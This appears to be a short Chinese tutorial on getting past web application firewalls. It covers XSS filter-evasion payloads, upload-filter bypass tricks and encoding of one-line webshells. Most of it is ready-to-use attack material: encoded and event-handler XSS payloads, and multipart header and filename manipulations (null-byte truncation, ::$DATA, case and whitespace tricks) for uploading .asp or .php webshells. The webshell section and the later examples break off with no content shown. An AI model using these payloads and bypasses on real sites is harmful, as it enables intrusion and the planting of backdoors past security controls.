一.本文介绍

1、本文介绍xss过waf、文件上传过waf、网页马过waf。

---

二.学习步骤

1、xss过waf的方法

使用编码或不常见的DOM型绕过：

1. 编码：
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>

2. DOM：
<video src=1 onerror=alert(/xss/)> 、 <body/onfocus=alert(/xss/)>  <details open ontoggle=alert(/xss/)>  <button onfocus=alert(/xss/) autofocus> 

<video src=1 onerror=alert(/xss/)>  <body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))>

2、文件上传过waf的方法

1. 文件名前缀加[0x09]：filename=“[0x09]backlion.asp”

2. 文件名去掉双引号绕过：filename=backlion.asp

3. 添加一个filename1的文件名参数，并赋值绕过：filename=“backlion.asp”;filename1=“test.jpg”

4. form变量改成f+orm组合绕过：Content-Disposition: f+orm-data;

5.  文件名后缀大小写绕过：filename=“backlion.Asp”

6. 去掉form-data变量绕过：ConTent-Disposition: name=“filepath”; filename=“backlion.asp”

7. 在Content-Disposition:后添加多个空格或者在form-data;后添加多个空格绕过。

8 . backlion.asp. (空格+.)绕过：filename=“backlion.asp .”

9. 文件名后加::$DATA绕过：filename=“backlion.asp::$DATA”

10. 截断绕过。

11. “回车换行，绕过：

正常情况上传木马时：

截断绕过：

未截断时：

截断后：

"caidao.php%00.jpg    image/jpeg

3、网页马过waf

对马进行各种编码绕过：

1. 正常一句话木马，会被检测到：

2. 编码后木马，未被检测到：